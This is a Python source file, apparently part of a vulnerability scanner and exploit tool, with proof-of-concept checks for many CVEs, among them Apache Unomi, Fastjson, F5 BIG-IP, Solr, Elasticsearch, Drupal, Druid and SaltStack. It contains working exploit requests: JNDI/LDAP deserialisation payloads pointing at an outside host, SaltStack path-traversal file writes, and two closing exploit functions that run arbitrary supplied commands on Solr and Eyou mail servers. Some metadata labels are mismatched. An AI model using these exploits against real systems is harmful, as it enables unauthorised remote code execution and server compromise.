self.vul_info["prt_name"] = "Apache Unomi: CVE-2020-13942"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2020_13942.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Apache Unomi remote code execution"
self.vul_info["vul_numb"] = "CVE-2020-13942"
self.vul_info["vul_apps"] = "Unomi"
self.vul_info["vul_date"] = "2020-11-23"
self.vul_info["vul_vers"] = "< 1.5.2"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码," \
"漏洞对应编号为CVE-2020-11975,而CVE-2020-13942漏洞是对CVE-2020-11975漏洞的补丁绕过," \
"攻击者绕过补丁检测的黑名单,发送恶意请求,在服务器执行任意代码。"
self.vul_info["cre_date"] = "2021-01-28"
self.vul_info["cre_auth"] = "zhzyker"
md = random_md5()
cmd = "ping " + md
self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd)
self.headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Content-Type': 'application/json'
}
try:
req = requests.post(self.url + "/context.json",
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
request = requests.get(self.ceye_api + self.ceye_token)
if md in request.text:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[ceye] [cmd:" + cmd + "]"
else:
rep = list(
json.loads(req.text)
["trackedConditions"])[0]["parameterValues"]["pagePath"]
if r"/tracker/" in rep:
self.vul_info["vul_data"] = dump.dump_all(req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["prt_info"] = "[maybe]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson_1247_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.47"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "null"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2019-07-15"
self.vul_info["vul_vers"] = "<= 1.2.47"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。"
self.vul_info["cre_date"] = "2021-01-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
md = random_md5()
dns = md + "." + self.ceye_domain
data = {
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://" + dns + "//Exploit",
"autoCommit": True
}
}
data = json.dumps(data)
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
req = requests.get(self.ceye_api + self.ceye_token)
if md in req.text:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ceye] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2017_1000353_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Jenkins: CVE-2017-1000353"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Jenkins 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2017-1000353"
self.vul_info["vul_apps"] = "Jenkins"
self.vul_info["vul_date"] = "2018-01-29"
self.vul_info["vul_vers"] = "<= 2.56, LTS <= 2.46.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Jenkins版本2.56和更早版本以及2.46.1 LTS和更早版本容易受到未经身份验证的远程代码执行的攻击。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
try:
self.req = requests.get(self.url,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.jenkins_version = self.req.headers['X-Jenkins']
self.jenkinsvuln = "2.56"
self.jenkinsvuln_lts = "2.46.1"
self.jver = self.jenkins_version.replace(".", "")
self.jenkins_lts = int(self.jver)
if self.jenkins_version.count(".", 0,
len(self.jenkins_version)) == 1:
if self.jenkins_version <= self.jenkinsvuln:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"vul_payd"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
self.vul_info[
"prt_info"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
elif self.jenkins_version.count(".", 0,
len(self.jenkins_version)) == 2:
if self.jenkins_lts <= 2461:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info[
"vul_payd"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
self.vul_info[
"prt_info"] = "[maybe] [version check] [version:" + self.jenkins_version + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_22986_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "F5 BIG-IP: CVE-2021-22986"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "F5 BIG-IP Remote Code Execution"
self.vul_info["vul_numb"] = "CVE-2021-22986"
self.vul_info["vul_apps"] = "Flink"
self.vul_info["vul_date"] = "2021-03-11"
self.vul_info["vul_vers"] = "< 16.0.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "Remote Code Execution"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "BIG-IP存在代码执行漏洞,该漏洞允许定义身份验证的攻击者通过BIG-IP" \
"管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令," \
"创建或删除文件以及替换服务。该中断只能通过控制界面利用,而不能通过数据界面利用。"
self.vul_info["cre_date"] = "2021-03-20"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
'User-Agent': self.ua,
'Accept': '*/*',
'Connection': 'close',
'Authorization': 'Basic YWRtaW46',
'X-F5-Auth-Token': '',
'Content-Type': 'application/json'
}
md = random_md5()
cmd = "echo " + md
data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace(
"RECOMMAND", cmd)
url = urljoin(self.url, "/mgmt/tm/util/bash")
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
r = json.loads(request.text)["commandResult"]
if request.status_code == 200:
if md in misinformation(r, md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_27905_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Solr: CVE-2021-27905"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Solr Replication handler SSRF"
self.vul_info["vul_numb"] = "CVE-2021-27905"
self.vul_info["vul_apps"] = "Solr"
self.vul_info["vul_date"] = "2021-04-14"
self.vul_info["vul_vers"] = "7.0.0-7.7.3, 8.0.0-8.8.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "SSRF"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "Apache Solr是一个开源搜索服务引擎,Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。漏洞产生在 ReplicationHandler 中的 masterUrl 参数( leaderUrl 参数)可指派另一个 Solr 核心上的 ReplicationHandler 讲索引数据复制到本地核心上。成功利用此漏洞可造成服务端请求伪造漏洞。"
self.vul_info["cre_auth"] = "zhzyker"
core_name = None
dns = dns_request()
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
payload = "/solr/re_core_name/replication?command=fetchindex&masterUrl" \
"=http://re_dns_domain/&wt=json&httpBasicAuthUser="******"&httpBasicAuthPassword="******"re_core_name", core_name).replace("re_dns_domain", dns)
url_ssrf = urljoin(self.url, payload)
r = requests.get(url_ssrf,
headers=self.headers,
timeout=self.timeout,
verify=False)
if dns in dns_result(dns):
self.vul_info["vul_payd"] = url_ssrf
self.vul_info["vul_data"] = dump.dump_all(r).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[ssrf] [dns] [corename: " + self.url + "/solr/" + core_name + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2014_3120_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Elasticsearch: CVE-2014-3120"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = self.payload_cve_2014_3120.replace(
"RECOMMAND", "whoami")
self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
self.vul_info["vul_numb"] = "CVE-2014-3120"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2014-04-29"
self.vul_info["vul_vers"] = "< 1.2"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "命令执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Elasticsearch 1.2之前的默认配置启用动态脚本编制,该脚本允许远程攻击者通过_search的source" \
"参数执行任意MVEL表达式和Java代码。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
self.data_send_info = r'''{ "name": "cve-2014-3120" }'''
md = random_md5()
cmd = "echo " + md
self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd)
try:
self.request = requests.post(self.url + "/website/blog/",
data=self.data_send_info,
headers=self.headers,
timeout=self.timeout,
verify=False)
self.req = requests.post(self.url + "/_search?pretty",
data=self.data_rce,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
self.r = list(json.loads(
self.req.text)["hits"]["hits"])[0]["fields"]["command"][0]
except:
self.r = "null"
if md in self.r:
self.vul_info["vul_data"] = dump.dump_all(self.req).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def fastjson_1262_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Fastjson: 1.2.62"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞"
self.vul_info["vul_numb"] = "null"
self.vul_info["vul_apps"] = "Fastjson"
self.vul_info["vul_date"] = "2019-10-07"
self.vul_info["vul_vers"] = "<= 1.2.62"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "官方暂未发布针对此漏洞的修复版本,开启了autoType功能的受影响用户可通过关闭autoType来规避风险" \
"(autoType功能默认关闭),另建议将JDK升级到最新版本。"
self.vul_info["cre_date"] = "2021-01-21"
self.vul_info["cre_auth"] = "zhzyker"
headers = {'User-Agent': self.ua, 'Content-Type': "application/json"}
md = dns_request()
dns = md
data = {
"@type": "org.apache.xbean.propertyeditor.JndiConverter",
"AsText": "ldap://" + dns + "//exploit"
}
data = json.dumps(data)
try:
try:
request = requests.post(self.url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
except:
pass
if dns_result(md):
self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] "
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info[
"prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] "
verify.scan_print(self.vul_info)
else:
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def time_2021_0515_poc(self):
self.threadLock.acquire()
self.vul_info[
"prt_name"] = "E-cology OA WorkflowServiceXml RCE: time-2021-0515"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "E-cology OA WorkflowServiceXml RCE"
self.vul_info["vul_numb"] = "time-2021-0415"
self.vul_info["vul_apps"] = "E-cology"
self.vul_info["vul_date"] = "2021-05-15"
self.vul_info["vul_vers"] = "E-cology <= 9.0"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "RCE"
self.vul_info["vul_data"] = "null"
self.vul_info[
"vul_desc"] = "The WorkflowServiceXml interface can be accessed without authorization. The attacker can call this interface to construct a specific HTTP request to bypass the security restrictions of E-cology itself to achieve remote command execution."
self.vul_info["cre_date"] = "2021-05-19"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/services%20/WorkflowServiceXml")
md = random_md5()
cmd = "echo " + md
headers = {
'User-Agent': self.ua,
'SOAPAction': '""',
'cmd': cmd,
"Content-Type": "text/xml;charset=UTF-8"
}
data = self.payload_time_2021_0515
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
#print(self.url + " " + str(request.status_code) + request.text)
if md in misinformation(request.text,
md) and request.status_code == 500:
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_payd"] = data
self.vul_info["prt_info"] = "[rce: " + url + " ]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2019_6340_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "drupal core restful remote code execution"
self.vul_info["vul_numb"] = "CVE-2019-6340"
self.vul_info["vul_apps"] = "Drupal"
self.vul_info["vul_date"] = "2019-02-22"
self.vul_info["vul_vers"] = "< 8.6.10"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "POST/PATCH 请求,在进行 REST API 操作的过程中,会将未经安全过滤的参数内容带入unserialize " \
"函数而触发反序列化漏洞,进而导致任意代码执行。"
self.vul_info["cre_date"] = "2021-01-29"
self.vul_info["cre_auth"] = "zhzyker"
self.path = "/node/?_format=hal_json"
md = random_md5()
cmd = "echo " + md
self.cmd_len = len(cmd)
self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
self.url)
self.headers = {
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/hal+json",
'Accept': "*/*",
'Cache-Control': "no-cache"
}
try:
request = requests.post(self.url + self.path,
data=self.payload,
headers=self.headers,
timeout=self.timeout,
verify=False)
if md in misinformation(request.text, md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["vul_urls"] = self.payload
self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25646_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "Apache Druid: CVE-2021-25646"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "Apache Druid 远程代码执行漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25646"
self.vul_info["vul_apps"] = "Druid"
self.vul_info["vul_date"] = "2021-02-01"
self.vul_info["vul_vers"] = "< 0.20.1"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。" \
"此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中," \
"经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。" \
"攻击者可直接构造恶意请求执行任意代码,控制服务器。"
self.vul_info["cre_date"] = "2021-02-03"
self.vul_info["cre_auth"] = "zhzyker"
url = urljoin(self.url, "/druid/indexer/v1/sampler")
headers = {
'Content-Type': 'application/json',
'User-Agent': self.ua,
'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2',
'Connection': 'keep-alive'
}
md = dns_request()
cmd = "ping " + md
data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd)
try:
request = requests.post(url,
data=data,
headers=headers,
timeout=self.timeout,
verify=False)
if dns_result(md):
self.vul_info["vul_data"] = dump.dump_all(request).decode(
'utf-8', 'ignore')
self.vul_info["vul_payd"] = data
self.vul_info["prt_resu"] = "PoCSuCCeSS"
self.vul_info["prt_info"] = "[dns] [rce] [cmd: " + cmd + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as e:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2021_25282_poc(self):
self.threadLock.acquire()
self.vul_info["prt_name"] = "SaltStack: CVE-2021-25282"
self.vul_info["prt_resu"] = "null"
self.vul_info["prt_info"] = "null"
self.vul_info["vul_urls"] = self.url
self.vul_info["vul_payd"] = "null"
self.vul_info["vul_name"] = "SaltStack 任意文件写入漏洞"
self.vul_info["vul_numb"] = "CVE-2021-25282"
self.vul_info["vul_apps"] = "SaltStack"
self.vul_info["vul_date"] = "2021-02-25"
self.vul_info["vul_vers"] = "< 3002.5"
self.vul_info["vul_risk"] = "high"
self.vul_info["vul_type"] = "远程代码执行漏洞"
self.vul_info["vul_data"] = "null"
self.vul_info["vul_desc"] = "未经授权的访问wheel_async,通过salt-api可以执行任意代码/命令。"
self.vul_info["cre_date"] = "2021-03-02"
self.vul_info["cre_auth"] = "zhzyker"
headers = {
"User-agent": self.ua,
"Content-Type": "application/json",
"Connection": "close"
}
url = self.url + "/run"
path = "../../../../../../../../../tmp/vuln"
data = {
'eauth': 'auto',
'client': 'wheel_async',
'fun': 'pillar_roots.write',
'data': 'vuln_cve_2021_25282',
'path': path
}
data = json.dumps(data)
try:
r = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
tag = list(json.loads(r.text)["return"])[0]["tag"]
jid = list(json.loads(r.text)["return"])[0]["jid"]
if r"salt/wheel" in tag:
if jid in tag:
self.vul_info["vul_data"] = dump.dump_all(r).decode('utf-8', 'ignore')
self.vul_info["prt_resu"] = "PoC_MaYbE"
self.vul_info["vul_payd"] = path
self.vul_info["prt_info"] = "[upload:" + path + "]"
verify.scan_print(self.vul_info)
except requests.exceptions.Timeout:
verify.timeout_print(self.vul_info["prt_name"])
except requests.exceptions.ConnectionError:
verify.connection_print(self.vul_info["prt_name"])
except Exception as error:
verify.error_print(self.vul_info["prt_name"])
self.threadLock.release()
def cve_2017_12629_exp(self, cmd):
vul_name = "Apache Solr: CVE-2017-12629"
core_name = "null"
new_core = random_md5()
payload1 = self.payload_cve_2017_12629.replace(
"RECOMMAND", cmd).replace("new_core", new_core)
payload2 = '[{"id": "test"}]'
url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
headers_solr1 = {
'Host': "localhost",
'Accept': "*/*",
'User-Agent': self.ua,
'Connection': "close"
}
headers_solr2 = {
'Host': "localhost",
'Accept-Language': "en",
'User-Agent': self.ua,
'Connection': "close",
'Content-Type': "application/json"
}
try:
request = requests.get(url_core,
headers=self.headers,
timeout=self.timeout,
verify=False)
try:
core_name = list(json.loads(request.text)["status"])[0]
except:
pass
req = requests.post(self.url + "/solr/" + str(core_name) +
"/config",
data=payload1,
headers=headers_solr1,
timeout=self.timeout,
verify=False)
request = requests.post(self.url + "/solr/" + str(core_name) +
"/update",
data=payload2,
headers=headers_solr2,
timeout=self.timeout,
verify=False)
raw_data = dump.dump_all(req).decode('utf-8', 'ignore')
r = "Command Executed Successfully (But No Echo)"
verify.exploit_print(r, raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
def cnvd_2021_26422_exp(self, cmd):
vul_name = "Eyou Email System: CNVD-2021-26422"
url = urljoin(self.url, "/webadm/?q=moni_detail.do&action=gragh")
payload = "type='|" + cmd + "||'"
try:
request = requests.post(url, data=payload, headers=self.headers, timeout=self.timeout, verify=False)
self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
verify.exploit_print(request.text, self.raw_data)
except requests.exceptions.Timeout:
verify.timeout_print(vul_name)
except requests.exceptions.ConnectionError:
verify.connection_print(vul_name)
except Exception:
verify.error_print(vul_name)
